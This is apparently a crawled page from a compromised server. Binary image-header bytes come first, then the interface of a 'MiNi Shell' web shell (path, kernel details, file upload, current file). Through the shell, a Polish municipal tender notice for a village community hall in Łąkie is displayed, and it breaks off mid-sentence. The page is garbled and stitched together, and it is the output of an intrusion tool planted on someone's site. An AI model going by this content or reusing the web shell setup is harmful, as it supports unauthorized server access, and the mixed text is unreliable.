JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220112/0001379701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Budowa świetlicy wiejskiej wraz z infr. tech.&#34; w ramach proj. &#34;Budowa integracyjnej Sali wiejskiej w miejscowości Łąkie na potrzeby rozwoju społ.-kult. ludności wsi, okolic i turystów&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Skąpe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770505</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Skąpe 65</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skąpe</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 683 419213</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@skape.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.skape.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa świetlicy wiejskiej wraz z infr. tech.&#34; w ramach proj. &#34;Budowa integracyjnej Sali wiejskiej w miejscowości Łąkie na potrzeby rozwoju społ.-kult. ludności wsi, okolic i turystów&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55570020-72d8-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00013797</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00008175/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa sali wiejskiej w miejscowości Łąkie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.skape.pl/dokumenty_rodzaj-10-przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej email: przetargi@skape.pl<br/>2) Adres strony internetowej postępowania: https://bip.skape.pl/dokumenty_rodzaj-10przetargi.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego (złożenie oferty wraz załącznikami), musi posiadać konto na ePUAP oraz korzystać z<br/>platformy miniPortalu: https://miniportal.uzp.gov.pl/ . Zamawiający określa następujące wymagania<br/>sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: stały dostęp do sieci Internet;<br/>posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e mail), komputer z zainstalowanym<br/>systemem operacyjnym Windows 7 (lub nowszym) albo Linux, zainstalowana dowolna przeglądarka<br/>internetowa , włączona obsługa JavaScript oraz Cookies. Do złożenia oferty konieczne jest posiadanie<br/>przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu<br/>elektronicznego, podpisu zaufanego lub podpisu osobistego. Szczegółowe informacje zawarte są w<br/>rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy, że:<br/>a) Administratorem danych osobowych jest Gmina Skąpe, Skąpe 65, 66-213 Skąpe, urzad@skape.pl,<br/>tel. 683419212.<br/>b) we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych można się kontaktować z Inspektorem Ochrony Danych u<br/>Administratora listownie na adres Administratora, na adres e-mail: iod@skape.pl lub tel. 683419213.<br/>c) Pani/Pana dane osobowe przetwarzane będą w celu prowadzenia postępowania o udzielenie<br/>zamówienia publicznego i zawarcia umowy;<br/>d) Podstawą prawną przetwarzania Pani/Pana danych osobowych są:<br/>- art. 6 ust. 1 lit. c) RODO przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze wynikającego z ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych (zwaną dalej PZP);<br/>- art. 6 ust. 1 lit. b) RODO przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba,<br/>której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem<br/>umowy;<br/>e) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o jawność postępowania na podstawie art. 18, art. 74 PZP,<br/>f) Pani/Pana dane osobowe nie są przekazywane do państwa trzeciego lub organizacji<br/>międzynarodowej;<br/>g) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy; okresy wskazane powyżej mogą<br/>zostać przedłużone do czasu, upływu okresu przedawnienia ewentualnych roszczeń, jeśli<br/>przetwarzanie danych osobowych będzie niezbędne do dochodzenia lub obrony przed takimi<br/>roszczeniami; po upływie wskazanych powyżej terminów dokumenty zostaną zarchiwizowane zgodnie<br/>z przepisami prawa obowiązującymi w tym zakresie.<br/>h) Informujemy, iż przysługują Pani/Panu następujące prawa:<br/>- prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>- prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, a także nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>i) przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego (tj.: Prezesa Urzędu<br/>Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa) jeżeli uważa Pani/Pan, że przetwarzanie<br/>danych osobowych narusza przepisy prawa;<br/>j) podanie danych osobowych jest wymogiem wynikającym z ustawy PZP, a w przypadku, złożenia<br/>oferty najkorzystniejszej także warunkiem zawarcia umowy o udzielenie zamówienia publicznego;<br/>niepodanie danych może skutkować wadliwością złożonej oferty i jej odrzuceniem;<br/>k) w trakcie przetwarzania danych żadne decyzje nie będą podejmowane w sposób zautomatyzowany<br/>oraz nie będą budowane żadne profile.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamawiający powierza Wykonawcy do wykonania, a Wykonawca zobowiązuje się zrealizować zadanie pn. „Budowa świetlicy wiejskiej wraz z infrastrukturą techniczną w m. Łąkie” w ramach projektu pn. „Budowa integracyjnej Sali wiejskiej w miejscowości turystycznej Łąkie na potrzeby rozwoju społ. -kulturalnego ludności wsi, okolic i turystów” dofinansowanego z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, który realizowany jest ze środków Funduszu Przeciwdziałania COVID-19 oraz, zgodnie z SWZ i dokumentacją projektową o której mowa w ust. 7 i 9 poniżej.<br/>2.	Opis inwestycji: W wyniku zadania powstanie obiekt, którego nigdy nie było we wsi, będzie to budynek jednokondygnacyjny o kubaturze 769,1 m3, ułatwiający dostęp osobom niepełnosprawnym, wyposażony w ogrzewanie ograniczające niską emisję. Zadanie zaspokoi potrzeby docelowo 1382 mieszkańców z 3 wsi, co stano 29% ogólnej liczby ludności gminy oraz turystów korzystających z licznych miejsc noclegowych. W jego wynkiku poszerzona zostanie oferta kulturalna, w tym zakresie bibliotecznym i turystyczna na terenie gminy.<br/>3.	Prace do wykonania w ramach powierzonego zadania będą prowadzone na dz. ewid. nr 14/2, 139 i 145 w miejscowości Łąkie , obr. 0003 Łąkie, jednostka ewid. 080803_2 Skąpe, stanowiące własność Gminy Skąpe.<br/>4.	Zakres prac obejmuje roboty wynikające z dokumentacji projektowej, a w szczególności:<br/>1)	roboty ziemne,<br/>2)	wykonanie fundamentów,<br/>3)	murowanie ścian konstrukcyjnych i działowych,<br/>4)	wykonanie konstrukcji dachu wraz z pokryciem,<br/>5)	montaż stolarki okiennej i drzwiowej,<br/>6)	ocieplenie ścian budynku płytą styropianową,<br/>7)	wykończenie elewacji cienkowarstwowym tynkiem mineralnym strukturalnym,<br/>8)	wykonanie posadzki, sufitów podwieszanych, tynków i okładzin ściennych,<br/>9)	montaż schodów (stalowych) zewnętrznych wraz z balustradą,<br/>10)	utwardzenie nawierzchni przy budynku kostką brukową,<br/>11)	wykonanie ściany oporowej,<br/>12)	wykonanie instalacji elektrycznej wewnątrz budynku,<br/>13)	wykonanie instalacji uziemiającej,<br/>14)	wykonanie instalacji wodnej wewnątrz budynku,<br/>15)	wykonanie instalacji kanalizacyjnej wewnątrz budynku,<br/>16)	wykonanie instalacji gazowej wewnątrz budynku,<br/>17)	instalacja C.O.<br/>18)	wykonanie wentylacji,<br/>19)	wykonanie przyłącza kanalizacji sanitarnej i wodociągowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z dokumentami zamówienia (SWZ)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wymóg posiadania niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia.<br/>Warunek spełni Wykonawca, który wykaże, że:<br/>1) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na przebudowie, budowie, rozbudowie budynku o powierzchni użytkowej co najmniej 100 m2 każda.<br/>2) dysponuje lub będzie dysponował i skieruje do realizacji zamówienia co najmniej:<br/>a) 1 osobę w charakterze kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno- budowlanej bez ograniczeń z co najmniej 3-letnim doświadczeniem w kierowaniu budową po uzyskaniu uprawnień budowlanych;<br/>b) 1 osobę w charakterze kierownika robót sanitarnych, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub im odpowiadające);<br/>c) 1 osobę w charakterze kierownika robót elektrycznych, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych (lub im odpowiadające) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy potwierdzające aktualność informacji zawartych w oświadczeniu wstępnym,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp-załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i powierzchni oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (zgodnie z załącznikiem nr 6 do SWZ).<br/>2. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami należy wypełnić wg wzoru stanowiącego Załącznik nr 7a i<br/>7b do SWZ, w celu wykazania spełnienia warunku dysponowania osobami zdolnymi do wykonania<br/>zamówienia. Załączniki 7a, 7b, muszą dokumentować spełnienie oczekiwań i wymagań<br/>Zamawiającego w zakresie kompetencji osób biorących udział w realizacji inwestycji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Załącznik nr 1 do SWZ – Formularz ofertowy.<br/>2. Załącznik nr 2 do SWZ - Oświadczenie Wykonawcy dotyczące spełniania warunków udziału w<br/>postępowaniu.<br/>3. Załącznik nr 3 do SWZ – Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z<br/>postępowania.<br/>4. Załącznik nr 4 do SWZ – Oświadczenie Wykonawcy o przynależności lub braku<br/>przynależności do grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 ustawy.<br/>5. Załącznik nr 5 do SWZ – Oświadczenie Wykonawcy o aktualność informacji zawartych w<br/>oświadczeniu wstępnym<br/>6. Załącznik nr 7b do SWZ - zobowiązanie do oddania do dyspozycji zasobów (jeśli dotyczy).<br/>7. Załącznik nr 7c do SWZ – oświadczenie podmiotu udostępniającego zasoby(jeśli dotyczy).<br/>8. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu<br/>udostępniającego zasoby w postępowaniu, o ile nie wynika z dokumentów załączonych przez<br/>Wykonawcę do oferty (jeżeli dotyczy).<br/>9. Załącznik nr 11 do SWZ –Przedmiar robót<br/>10. Dokument wadium, w przypadku wniesienia wadium w formie, o której mowa w ROZDZIALE<br/>IX. pkt 7 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000 PLN (słownie: dziesięć tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/> 1) pieniądzu; <br/> 2) gwarancjach bankowych; <br/> 3) gwarancjach ubezpieczeniowych; <br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w pieniądzu należy wnieść na rachunek bankowy Zamawiającego Bank PKO BP SA o/Zielona Góra 69 1020 5402 0000 0502 0027 8903 z dopiskiem: „Wadium – budowa świetlicy w m. Łąkie – ZP.271.1.2022”<br/>5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.<br/>6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7. Wniesienie wadium w formie 